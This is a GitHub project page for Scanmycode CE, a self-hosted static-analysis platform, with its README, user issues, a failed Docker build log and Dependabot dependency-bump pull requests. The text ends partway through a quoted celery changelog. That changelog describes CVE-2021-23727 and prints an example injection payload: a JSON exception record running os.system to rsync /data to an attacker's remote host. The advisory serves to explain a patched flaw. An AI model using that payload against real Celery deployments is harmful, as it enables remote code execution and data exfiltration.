Code Scanning/SAST/Static Analysis/Linting using many tools/Scanners with One Report - Scanmycode Community Edition (CE)

Overview

Star it

If you like it, please give it a GitHub star/fork/contribute. This will ensure continous development

TLDR;

To install it. Install docker and docker-compose and then:

git clone [email protected]:marcinguy/scanmycode-ce.git
cd scanmycode-ce/docker
./start.sh

Go in the Browser to:

http://localhost:5000

Sign up locally (and login in when needed)

Under the hood

Progpilot, PMD, Bandit, Brakeman, Gosec, confused, semgrep, trufflehog3, jshint, log4shell via custom semgrep rule and other(s). Some were modified.

Recorded DEMO

Community Edition does not have GitHub support and other plugins. But rest is the same.

scanmycode-demo

Welcome to Scanmycode CE (Community Edition)!

Scanmycode is based on QuantifedCode. QuantifiedCode is a code analysis & automation platform. It helps you to keep track of issues and metrics in your software projects, and can be easily extended to support new types of analyses. The application consists of several parts:

  • A frontend, realized as a React.js app
  • A backend, realized as a Flask app, that exposes a REST API consumed by the frontend
  • A background worker, realized using Celery, that performs the code analysis

Currently supports: PHP, Java, Scala, Python, Ruby, Javascript, GO, Secret Scanning, Dependency Confusion, Trojan Source, Open Source and Proprietary Checks (total ca. 1000 checks)

Advantages:

  • Many tools, one report (unification)
  • Dismiss, collaborate on findings. Mark false-positives
  • Enable/disable each individual check in Checkers
  • ca. 1000 checks now (Linters, Static Code Analysis/Code Scanning)
  • any tool outputting JSON can be added
  • fast (checks only new code on recheck)
  • Git support (HTTPS/TLS and SSH). For private repositories only SSH.
  • all REST API callable (CI/CD integrateable)
  • Swiss army knife tool/SIEM for Code Scanning
  • 100% Code transparency & full control of your code

Cloud version and more at https://www.scanmycode.today

Cloud version has also many other plugins, also other plugins are commercially available for licensing (GitHub, GitHub organizations, Slack)

Contribute

Looking for contributing individuals and organizations. Feel free to contact me at [email protected]

TODO

  • update Dependencies (Backend & Frontend)
  • update to latest React
  • update to Python3
  • update/add new Checkers (if you wish)

Licensing

Scanmycode's QuantifiedCode parts remain released under BSD-3 Clause License. However, modifications are released under LGPL-2.1 with Commonsclause.

You can use this software, but cannot sell it, also base services on it (SaaS - Software as a Service setups). This is the Commonsclause. If you would like to do it, please contact me first for the permission at [email protected]

Installation

We provide several options for installing Scanmycode. Which one is the right one for you depends on your use case.

  • The manual installation is best if you want to modify or change Scanmycode
  • The Docker-based installation is probably the easiest way to try Scanmycode without much work
  • The Ansible-based installation is the most suitable way if you want to run Scanmycode in a professional infrastructure (possibly with multiple servers)

The following section will only discuss the manual installation process, for the other options please check their corresponding repositories.

Manual Installation

The installation consists of three parts:

  • Install the dependencies required to run Scanmycode
  • Download the required source code
  • Set up the configuration

Installing Dependencies

Scanmycode requires the following external dependencies:

  • A message broker (required for the background tasks message queue). We recommend either RabbitMQ or Redis.
  • A database (required for the core application). We recommend PostgreSQL, but SQLite is supported as well. Other database systems might work too (e.g. MySQL), but are currently not officially supported. If you need to run Scanmycode on a non-supported database, please get in touch with us and we'll be happy to provide you some guidance.

Download the Scanmycode CE source code

Now with the dependencies installed, we can go ahead and download Scanmycode:

    git clone [email protected]:marcinguy/scanmycode-ce.git

Set up a virtual environment (optional)

In addition, it is advised to create a (Python 2.7) virtual environment to run Scanmycode in:

    virtualenv venv

    #activate the virtual environment
    source venv/bin/activate

Install the required Python packages

Scanmycode CE manages dependencies via the Python package manager, pip. To install them, simply run

    pip install -r requirements.txt

Edit Settings

Scanmycode gets configured via YAML settings files. When starting up the application, it incrementally loads settings from several files, recursively updating the settings object. First, it will load default settings from quantifiedcode/settings/default.yml. Then, it will check if a QC_SETTINGS environment variable is defined and points to a valid file, and if so it will load settings from it (possibly overwriting default settings). If not, it will look for a settings.yml file in the current working directory and load settings from there. Additionally, it will check if a QC_SECRETS environment variable is defined and points to a valid file, and also load settings from there (this is useful for sensitive settings that should be kept separate from the rest [e.g. to not check them into version control]).

There is a sample settings.yml file in the root of the repository that you can start from.

Running the Setup

After editing your settings, run the setup command via

    #run from the root directory of the repository
    python manage.py setup

The setup assistant will iteratively walk you through the setup, and when finished you should have a working instance of Scanmycode!

Running the web application

To run the web application, simply run

    python manage.py runserver

Running the background worker

To run the background worker, simply run

    python manage.py runworker

Docker-Based Installation

See docker folder. You can spin up everything using one command.

Ansible-Based Installation

Coming Soon!

Comments
  • azure devops integration failing

    azure devops integration failing

    Hi @marcinguy I'm trying to integrate betterscan in azure devops pipeline as per documentation but while running SAST task I'm betting below error message

    Starting: Static Application Security Test (SAST)

    Task : Command line Description : Run a command line script using Bash on Linux and macOS and cmd.exe on Windows Version : 2.212.0 Author : Microsoft Corporation Help : https://docs.microsoft.com/azure/devops/pipelines/tasks/utility/command-line

    Generating script. ========================== Starting Command Output =========================== /bin/bash --noprofile --norc /__w/_temp/78c91d4f-67b0-43bc-8ab3-6df1b970aab7.sh Switched to a new branch 'master' /root /__w/1/s Loading plugin: git Loading plugin: trufflehog3 Loading plugin: trojansource Loading plugin: metrics Loading plugin: bandit Loading plugin: brakeman Loading plugin: phpanalyzer Loading plugin: gosec Loading plugin: confused Loading plugin: pmd Loading plugin: semgrep Loading plugin: semgrepdefi Loading plugin: semgrepjs Loading plugin: checkov Loading plugin: kubescape Loading plugin: insidersecswift Loading plugin: insiderseckotlin Loading plugin: insiderseccsharp Loading plugin: pmdapex Loading plugin: semgrepccpp Loading plugin: semgrepjava Loading plugin: semgrepeslint Loading plugin: graudit Loading plugin: text4shell Loading plugin: yara Cannot find a checkmate project in the current directory tree, aborting. ##[error]Bash exited with code '255'. Finishing: Static Application Security Test (SAST)

    opened by devendrakajala 5
  • Service 'server' failed to build

    Service 'server' failed to build

    $ ./start.sh
    Building server
    Sending build context to Docker daemon  14.85kB
    Step 1/30 : FROM python:2.7
     ---> 68e7be49c28c
    Step 2/30 : WORKDIR /
     ---> Using cache
     ---> d6858cc88a37
    Step 3/30 : RUN mkdir -p /srv
     ---> Using cache
     ---> b70ac21e5cb7
    Step 4/30 : RUN git clone https://github.com/marcinguy/scanmycode-ce.git /srv/scanmycode
     ---> Using cache
     ---> d98392912441
    Step 5/30 : WORKDIR /srv/scanmycode
     ---> Using cache
     ---> 2e54818b8ffa
    Step 6/30 : RUN git pull
     ---> Using cache
     ---> 6619cf1ee554
    Step 7/30 : RUN apt update && apt install -y libcurl4-nss-dev libssl-dev tree sudo git ssh rsync npm ruby-sass
     ---> Using cache
     ---> bc668975da08
    Step 8/30 : RUN tree
     ---> Using cache
     ---> 6a8da75efb63
    Step 9/30 : RUN pip install -r requirements.txt
     ---> Using cache
     ---> b1caa06fb2d0
    Step 10/30 : RUN pip install pylint===1.9.2
     ---> Using cache
     ---> cda9ca606748
    Step 11/30 : RUN pip install stripe
     ---> Using cache
     ---> fb63ce6873aa
    Step 12/30 : RUN git clone https://github.com/marcinguy/checkmate-ce /checkmate
     ---> Using cache
     ---> 7d2b41952c77
    Step 13/30 : WORKDIR /checkmate
     ---> Using cache
     ---> fd32c6a1e7b9
    Step 14/30 : RUN tree /checkmate
     ---> Using cache
     ---> c4f585f63486
    Step 15/30 : RUN python setup.py install
     ---> Using cache
     ---> 91e20749b951
    Step 16/30 : RUN ln -s /srv/scanmycode/quantifiedcode/settings/default.yml /srv/scanmycode/settings.yml
     ---> Using cache
     ---> 69a72977d5fe
    Step 17/30 : RUN pip install psycopg2 --upgrade
     ---> Using cache
     ---> 488aca4eaeab
    Step 18/30 : WORKDIR /srv/scanmycode/quantifiedcode/frontend
     ---> Using cache
     ---> b7783c525c4f
    Step 19/30 : RUN npm install -g bower
     ---> Using cache
     ---> bd1aa019f444
    Step 20/30 : RUN npm install --save-dev @babel/core @babel/cli
     ---> Running in bc39259dec57
    npm WARN npm npm does not support Node.js v10.24.0
    npm WARN npm You should probably upgrade to a newer version of node as we
    npm WARN npm can't make any promises that npm will work with this version.
    npm WARN npm Supported releases of Node.js are the latest release of 4, 6, 7, 8, 9.
    npm WARN npm You can find the latest version at https://nodejs.org/
    npm WARN notice [SECURITY] clean-css has the following vulnerability: 1 low. Go here for more details: https://www.npmjs.com/advisories?search=clean-css&version=3.2.8 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.npm WARN tar write after end
    npm WARN notice [SECURITY] bower has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=bower&version=1.4.1 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN notice [SECURITY] uglify-js has the following vulnerabilities: 2 low. Go here for more details: https://www.npmjs.com/advisories?search=uglify-js&version=2.3.6 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN notice [SECURITY] ua-parser-js has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=ua-parser-js&version=0.7.21 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN notice [SECURITY] trim-newlines has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=trim-newlines&version=1.0.0 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] decompress-zip has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=decompress-zip&version=0.1.0 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] bl has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=bl&version=1.2.2 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN tar write after end
    npm WARN notice [SECURITY] request has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=request&version=2.53.0 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] handlebars has the following vulnerabilities: 2 critical, 4 high, 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=handlebars&version=2.0.0 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] set-value has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=set-value&version=2.0.1 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] hawk has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=hawk&version=1.1.1 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] node-fetch has the following vulnerability: 1 low. Go here for more details: https://www.npmjs.com/advisories?search=node-fetch&version=1.7.3 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] braces has the following vulnerability: 1 low. Go here for more details: https://www.npmjs.com/advisories?search=braces&version=1.8.5 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] tough-cookie has the following vulnerabilities: 1 high, 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=tough-cookie&version=0.12.1 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] path-parse has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=path-parse&version=1.0.6 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] minimist has the following vulnerability: 1 low. Go here for more details: https://www.npmjs.com/advisories?search=minimist&version=0.0.10 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] lodash has the following vulnerabilities: 2 high. Go here for more details: https://www.npmjs.com/advisories?search=lodash&version=4.17.19 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] json-schema has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=json-schema&version=0.2.3 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] glob-parent has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=glob-parent&version=2.0.0 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] bl has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=bl&version=0.9.5 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] lodash has the following vulnerabilities: 4 high, 2 low. Go here for more details: https://www.npmjs.com/advisories?search=lodash&version=2.4.2 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] ini has the following vulnerability: 1 low. Go here for more details: https://www.npmjs.com/advisories?search=ini&version=1.3.5 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] cryptiles has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=cryptiles&version=0.2.2 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] hosted-git-info has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=hosted-git-info&version=2.8.8 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN tar write after end
    npm WARN notice [SECURITY] hoek has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=hoek&version=0.9.1 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] deep-extend has the following vulnerability: 1 low. Go here for more details: https://www.npmjs.com/advisories?search=deep-extend&version=0.2.11 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] minimist has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=minimist&version=0.0.8 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] hawk has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=hawk&version=2.3.1 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] tunnel-agent has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=tunnel-agent&version=0.4.3 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] qs has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=qs&version=2.3.3 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] semver has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=semver&version=2.3.2 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] hoek has the following vulnerability: 1 moderate. Go here for more details: https://www.npmjs.com/advisories?search=hoek&version=2.16.3 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] minimatch has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=minimatch&version=2.0.10 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm WARN notice [SECURITY] cryptiles has the following vulnerability: 1 high. Go here for more details: https://www.npmjs.com/advisories?search=cryptiles&version=2.0.5 - Run `npm i npm@latest -g` to upgrade your npm version, and then `npm audit` to get more info.
    npm ERR! cb() never called!
    
    npm ERR! This is an error with npm itself. Please report this error at:
    npm ERR!     <https://github.com/npm/npm/issues>
    
    npm ERR! A complete log of this run can be found in:
    npm ERR!     /root/.npm/_logs/2022-02-07T04_48_57_242Z-debug.log
    The command '/bin/sh -c npm install --save-dev @babel/core @babel/cli' returned a non-zero code: 1
    ERROR: Service 'server' failed to build : Build failed
    
    opened by firmianay 4
  • Bump alembic from 1.8.1 to 1.9.1

    Bump alembic from 1.8.1 to 1.9.1

    Bumps alembic from 1.8.1 to 1.9.1.

    Release notes

    Sourced from alembic's releases.

    1.9.1

    Released: December 23, 2022

    bug

    • [bug] [autogenerate] Fixed issue where server default compare would not work for string defaults that contained backslashes, due to mis-rendering of these values when comparing their contents.

      References: #1145

    • [bug] [oracle] Implemented basic server default comparison for the Oracle backend; previously, Oracle's formatting of reflected defaults prevented any matches from occurring.

    • [bug] [sqlite] Adjusted SQLite's compare server default implementation to better handle defaults with or without parens around them, from both the reflected and the local metadata side.

    • [bug] [mssql] Adjusted SQL Server's compare server default implementation to better handle defaults with or without parens around them, from both the reflected and the local metadata side.

    1.9.0

    Released: December 15, 2022

    feature

    • [feature] [commands] Added new Alembic command alembic check. This performs the widely requested feature of running an "autogenerate" comparison between the current database and the MetaData that's currently set up for autogenerate, returning an error code if the two do not match, based on current autogenerate settings. Pull request courtesy Nathan Louie.

      References: #724

    bug

    • [bug] [tests] Fixed issue in tox.ini file where changes in the tox 4.0 series to the format of "passenv" caused tox to not function correctly, in particular raising an error as of tox 4.0.6.

    • [bug] [typing] Fixed typing issue where revision.process_revision_directives was not fully typed; additionally ensured all Callable and Dict arguments to EnvironmentContext.configure() include parameters in

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies python 
    opened by dependabot[bot] 1
  • Bump alembic from 1.8.1 to 1.9.0

    Bump alembic from 1.8.1 to 1.9.0

    Bumps alembic from 1.8.1 to 1.9.0.

    Release notes

    Sourced from alembic's releases.

    1.9.0

    Released: December 15, 2022

    feature

    • [feature] [commands] Added new Alembic command alembic check. This performs the widely requested feature of running an "autogenerate" comparison between the current database and the MetaData that's currently set up for autogenerate, returning an error code if the two do not match, based on current autogenerate settings. Pull request courtesy Nathan Louie.

      References: #724

    bug

    • [bug] [tests] Fixed issue in tox.ini file where changes in the tox 4.0 series to the format of "passenv" caused tox to not function correctly, in particular raising an error as of tox 4.0.6.

    • [bug] [typing] Fixed typing issue where revision.process_revision_directives was not fully typed; additionally ensured all Callable and Dict arguments to EnvironmentContext.configure() include parameters in the typing declaration.

      Additionally updated the codebase for Mypy 0.990 compliance.

      References: #1110

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies python 
    opened by dependabot[bot] 1
  • Bump jquery from 3.6.1 to 3.6.2 in /quantifiedcode/frontend

    Bump jquery from 3.6.1 to 3.6.2 in /quantifiedcode/frontend

    Bumps jquery from 3.6.1 to 3.6.2.

    Release notes

    Sourced from jquery's releases.

    jQuery 3.6.2 :has arrived!

    https://blog.jquery.com/2022/12/13/jquery-3-6-2-released/

    Commits
    • 1552b93 3.6.2
    • 2215119 Release: update authors
    • 0d9fae4 Build: Limit permissions for GitHub workflows
    • f4809f9 Build: Test on Node.js 18 & 19, stop testing on Node 12
    • 5318e31 Selector:Manipulation: Fix DOM manip within template contents
    • a1b7ae3 Selector: Update Sizzle from 2.3.7 to 2.3.8
    • 28241b7 Build: Bump actions/setup-node from 3.5.0 to 3.5.1
    • ee0fec0 Selector: Update Sizzle from 2.3.6 to 2.3.7
    • ed02835 Build: Update Grunt from 1.4.1 to 1.5.3
    • 76edd26 Docs: Update the README of the published package
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies javascript 
    opened by dependabot[bot] 1
  • Bump sqlalchemy from 1.4.44 to 1.4.45

    Bump sqlalchemy from 1.4.44 to 1.4.45

    Bumps sqlalchemy from 1.4.44 to 1.4.45.

    Release notes

    Sourced from sqlalchemy's releases.

    1.4.45

    Released: December 10, 2022

    orm

    • [orm] [bug] Fixed bug where _orm.Session.merge() would fail to preserve the current loaded contents of relationship attributes that were indicated with the _orm.relationship.viewonly parameter, thus defeating strategies that use _orm.Session.merge() to pull fully loaded objects from caches and other similar techniques. In a related change, fixed issue where an object that contains a loaded relationship that was nonetheless configured as lazy='raise' on the mapping would fail when passed to _orm.Session.merge(); checks for "raise" are now suspended within the merge process assuming the _orm.Session.merge.load parameter remains at its default of True.

      Overall, this is a behavioral adjustment to a change introduced in the 1.4 series as of #4994, which took "merge" out of the set of cascades applied by default to "viewonly" relationships. As "viewonly" relationships aren't persisted under any circumstances, allowing their contents to transfer during "merge" does not impact the persistence behavior of the target object. This allows _orm.Session.merge() to correctly suit one of its use cases, that of adding objects to a Session that were loaded elsewhere, often for the purposes of restoring from a cache.

      References: #8862

    • [orm] [bug] Fixed issues in _orm.with_expression() where expressions that were composed of columns that were referenced from the enclosing SELECT would not render correct SQL in some contexts, in the case where the expression had a label name that matched the attribute which used _orm.query_expression(), even when _orm.query_expression() had no default expression. For the moment, if the _orm.query_expression() does have a default expression, that label name is still used for that default, and an additional label with the same name will continue to be ignored. Overall, this case is pretty thorny so further adjustments might be warranted.

      References: #8881

    engine

    • [engine] [bug] Fixed issue where _engine.Result.freeze() method would not work for textual SQL using either _sql.text() or _engine.Connection.exec_driver_sql().

      References: #8963

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies python 
    opened by dependabot[bot] 1
  • Bump certifi from 2022.9.24 to 2022.12.7

    Bump certifi from 2022.9.24 to 2022.12.7

    Bumps certifi from 2022.9.24 to 2022.12.7.

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.
    dependencies python 
    opened by dependabot[bot] 1
  • Bump importlib-metadata from 4.13.0 to 5.1.0

    Bump importlib-metadata from 4.13.0 to 5.1.0

    Bumps importlib-metadata from 4.13.0 to 5.1.0.

    Changelog

    Sourced from importlib-metadata's changelog.

    v5.1.0

    • #415: Instrument SimplePath with generic support.

    v5.0.0

    • #97, #284, #300: Removed compatibility shims for deprecated entry point interfaces.
    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies python 
    opened by dependabot[bot] 1
  • Bump celery from 3.1.25 to 5.2.2

    Bump celery from 3.1.25 to 5.2.2

    Bumps celery from 3.1.25 to 5.2.2.

    Release notes

    Sourced from celery's releases.

    5.2.2

    Release date: 2021-12-26 16:30 P.M UTC+2:00

    Release by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      {
            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data [email protected]:~/data"
      }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    v5.2.1

    Release date: 2021-11-16 8.55 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.
    • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

    ... (truncated)

    Changelog

    Sourced from celery's changelog.

    5.2.2

    :release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      .. code-block:: python

        {
              "exc_module": "os",
              'exc_type': "system",
              "exc_message": "rsync /data [email protected]:~/data"
        }
      

